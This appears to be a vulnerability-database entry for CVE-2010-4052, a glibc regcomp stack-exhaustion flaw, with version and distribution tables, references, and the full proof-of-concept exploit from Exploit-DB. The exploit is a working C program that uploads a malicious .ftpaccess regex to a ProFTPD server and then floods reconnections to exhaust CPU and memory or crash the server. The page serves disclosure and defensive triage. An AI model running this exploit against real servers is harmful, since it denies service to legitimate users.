CVE-2010-4052
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
6.0
Description
Stack consumption vulnerability in the regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (resource exhaustion) via a regular expression containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service
// source: https://www.securityfocus.com/bid/45233/info
GNU glibc is prone to a denial-of-service vulnerability due to stack exhaustion.
Successful exploits will allow attackers to make the affected computer unresponsive, denying service to legitimate users.
This issue affects unknown versions of the glibc library. This BID will be updated when more details become available.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
/*
proftpd multiple exploit for VU#912279 (only with GNU libc/regcomp(3))
by Maksymilian Arciemowicz
References:
http://www.kb.cert.org/vuls/id/912279
http://cxib.net/
http://securityreason.com/
Tested:
Ubuntu + proftpd
This exploit need writing privileges to create .ftpaccess file with vulnerable regular expressions. Works well only under Linux
172.16.124.1 - NetBSD 5.1 (HACKER)
172.16.124.134 - Ubuntu 10.10 (TARGET)
PoC1:
.exitcx@cx64:~/advs/done$ ./reg1 172.16.124.134 21 cx password 172.16.124.1 1
Try create .ftpaccess with HideFiles "(\.ftpaccess|(.*{10,}{10,}{10,}{10,}))$"
...
send: stat .
send: USER cx
PASS password
send: stat .
Can`t connect
.exit
cx@cx64:~/advs/done$ telnet 172.16.124.134 21
Trying 172.16.124.134...
telnet: Unable to connect to remote host: Connection refused
Resume:
- created .ftpaccess file, and connect<=>disconnect
It will create a lot of proftpd children with 100% CPU usage.
If we try
./reg1 172.16.124.134 21 cx password 172.16.124.1 3
any proftpd children will generate memory exhausion
Options:
1 - cpu resource exhausion
2 - crash (recursion)
3 - memory resource exhausion
4 - possible crash with (ulimit {-v|-m})
*/
char expl0[]="HideFiles \"(\\.ftpaccess|(.*{10,}{10,}{10,}{10,}))$\""; //CVE-2010-4052 Long execution
char expl1[]="HideFiles \"(\\.ftpaccess|(.*{10,}{10,}{10,}{10,}{10,}))$\""; //CVE-2010-4051 Crash
char expl2[]="HideFiles \"(.*+++++++++++++++++++++++++++++(\\w+))\""; // memory exhausion
char expl3[]="HideFiles \"(.*++++++++++++++++++++++++++++++(\\w+))\""; // if virtual memory limited, crash
int sendftp(int stream,char *what){
if(-1==send(stream,what,strlen(what),0))
printf("Can't send %s\n",what);
else
printf("send: %s\n",what);
bzero(what,sizeof(what));
}
void readftp(int stream,int flag){
if(flag==1) flag=MSG_DONTWAIT;
else flag=0;
char *readline=malloc(sizeof(char)*(4096+1));
memset(readline,'\x00',(4096+1));
if(recv(stream,readline,4096,flag)<1){
printf("Can't read from stream\n");
if(readline) free(readline);
close(stream);
exit(1);
}
else{
if(readline)
write(1, readline, strlen(readline));
fflush(stdout);
}
free(readline);
}
int attack(host,port,login,pass)
char *host,*port,*login,*pass;
{
char buffer[1024]; // send ftp command buffor
int sockfd,n,error;
struct addrinfo hints;
struct addrinfo *res, *res0;
memset(&hints, 0, sizeof(hints));
hints.ai_family = PF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
error = getaddrinfo(host,port,&hints,&res0);
if (error){
errorcon:
printf("Can`t connect\n.exit");
exit(1);
}
if((sockfd=socket(res0->ai_family,res0->ai_socktype,res0->ai_protocol))<0) goto errorcon;
if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon;
snprintf(buffer,1024,"USER %s\nPASS %s\n",login,pass);
sendftp(sockfd,buffer);
bzero(buffer,1024);
snprintf(buffer,1024,"STAT .\n");
sendftp(sockfd,buffer);
freeaddrinfo(res0);
close(sockfd);
}
void exploreip(char *ip, int (*ipnum)[4]){
char *wsk;
wsk=(char *)strtok(ip,".");
(*ipnum)[0]=atoi(wsk);
wsk=(char *)strtok(NULL,".");
(*ipnum)[1]=atoi(wsk);
wsk=(char *)strtok(NULL,".");
(*ipnum)[2]=atoi(wsk);
wsk=(char *)strtok(NULL,".");
(*ipnum)[3]=atoi(wsk);
}
int createexpl(host,port,login,pass,lip,pattern)
char *host,*port,*login,*pass,*lip,*pattern;
{
char buffer[1024]; // send ftp command buffor
int ipnum[4];
int sockfd,n,error,sendstream,binarystream,sendport = (1024 + getpid());
struct addrinfo hints;
struct addrinfo *res, *res0;
struct sockaddr_in remo, loca;
int len = sizeof(remo);
memset(&hints, 0, sizeof(hints));
hints.ai_family = PF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
error = getaddrinfo(host,port,&hints,&res0);
if (error){
errorcon:
if(sendstream) close(sendstream);
printf("Can`t connect\n.exit");
exit(1);
}
if((sockfd=socket(res0->ai_family,res0->ai_socktype, res0->ai_protocol))<0) goto errorcon;
if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon;
readftp(sockfd,1024);
snprintf(buffer,1024,"USER %s\nPASS %s\n",login,pass);
sendftp(sockfd,buffer);
readftp(sockfd,1024);
readftp(sockfd,1024);
exploreip(lip,&ipnum);
snprintf(buffer,1024,"TYPE I\nPORT %d,%d,%d,%d,%d,%d\n",ipnum[0],ipnum[1],ipnum[2],ipnum[3],sendport/256,sendport%256);
sendftp(sockfd,buffer);
readftp(sockfd,1024);
bzero(&loca, sizeof(loca));
loca.sin_family = AF_INET;
loca.sin_port=htons(sendport);
loca.sin_addr.s_addr = htonl(INADDR_ANY);
if((sendstream=socket(AF_INET, SOCK_STREAM,0))<0) goto errorcon;
if((bind(sendstream, (struct sockaddr *) &loca, sizeof(loca)))<0) goto errorcon;
if(listen(sendstream, 10) < 0) goto errorcon;
snprintf(buffer,1024,"STOR .ftpaccess\n");
sendftp(sockfd,buffer);
readftp(sockfd,1024);
if((binarystream=accept(sendstream,(struct sockaddr *)&remo,&len)) < 0) goto errorcon;
write(binarystream,pattern,strlen(pattern));
freeaddrinfo(res0);
close(sendstream);
printf("Created .ftpaccess file with %s\nIt`s time to attack...\n",pattern);
sleep(3);
return 0;
}
void usage(){
printf("Use: ./exploit target_ip port username password [your_ip] [option]\n\nCreate .ftpaccess with selected attack\noptions:\n1 - Long execution CVE-2010-4052\n2 - Recursion Crash CVE-2010-4051\n3 - Memory exhausion \n4 - Crash if virtual memory limited\n\n");
exit(1);
}
int main(int argc,char *argv[])
{
char *login,*pass,*lip=NULL;
char logindef[]="anonymous",passdef[]="cx@127.0.0.1";
printf("This is exploit for ERE (GNU libc)\nby Maksymilian Arciemowicz\n\n");
if(argc<3) usage();
char *host=argv[1];
char *port=argv[2];
if(4<=argc) login=argv[3];
else login=logindef;
if(5<=argc) pass=argv[4];
else pass=passdef;
if(6<=argc) lip=argv[5];
if(7<=argc) switch(atoi(argv[6])){
case 1:
printf("Try create .ftpaccess with %s\n\n",expl0);
createexpl(host,port,login,pass,lip,expl0);
break;
case 2:
printf("Try create .ftpaccess with %s\n\n",expl1);
createexpl(host,port,login,pass,lip,expl1);
break;
case 3:
printf("Try create .ftpaccess with %s\n\n",expl2);
createexpl(host,port,login,pass,lip,expl2);
break;
case 4:
printf("Try create .ftpaccess with %s\n\n",expl3);
createexpl(host,port,login,pass,lip,expl3);
break;
default:
usage();
break;
};
while(1) attack(host,port,login,pass);
return 0; // never happen
}GNU libc/regcomp(3) - Multiple Vulnerabilities
Source code queued for fetch โ refresh in a moment.
OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2.19-4 |
| sid | Fixed | 2.19-4 |
| forky | Fixed | 2.19-4 |
| bullseye | Fixed | 2.19-4 |
| bookworm | Fixed | 2.19-4 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| gnu | glibc | 1.00 | |
| gnu | glibc | 1.01 | |
| gnu | glibc | 1.02 | |
| gnu | glibc | 1.03 | |
| gnu | glibc | 1.04 | |
| gnu | glibc | 1.05 | |
| gnu | glibc | 1.06 | |
| gnu | glibc | 1.07 | |
| gnu | glibc | 1.08 | |
| gnu | glibc | 1.09 | |
| gnu | glibc | 1.09.1 | |
| gnu | glibc | 2.1 | |
| gnu | glibc | 2.1.1 | |
| gnu | glibc | 2.1.1.6 | |
| gnu | glibc | 2.1.2 | |
| gnu | glibc | 2.1.3 | |
| gnu | glibc | 2.1.3.10 | |
| gnu | glibc | 2.1.9 | |
| gnu | glibc | 2.10 | |
| gnu | glibc | 2.10.1 | |
| gnu | glibc | 2.10.2 | |
| gnu | glibc | 2.11 | |
| gnu | glibc | 2.11.1 | |
| gnu | glibc | 2.11.2 | |
| gnu | glibc | 2.11.3 | |
| gnu | glibc | 2.12.0 | |
| gnu | glibc | 2.12.1 | |
| gnu | glibc | 2.12.2 | |
References
- http://cxib.net/stuff/proftpd.gnu.c
- http://seclists.org/fulldisclosure/2011/Jan/78
- http://secunia.com/advisories/42547
- http://securityreason.com/achievement_securityalert/93
- http://securityreason.com/securityalert/8003
- http://securitytracker.com/id?1024832
- http://www.exploit-db.com/exploits/15935
- http://www.kb.cert.org/vuls/id/912279
- http://www.securityfocus.com/archive/1/515589/100/0/threaded
- http://www.securityfocus.com/bid/45233
- https://bugzilla.redhat.com/show_bug.cgi?id=645859
- https://security-tracker.debian.org/tracker/CVE-2010-4052
CWEs
CWE-399
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.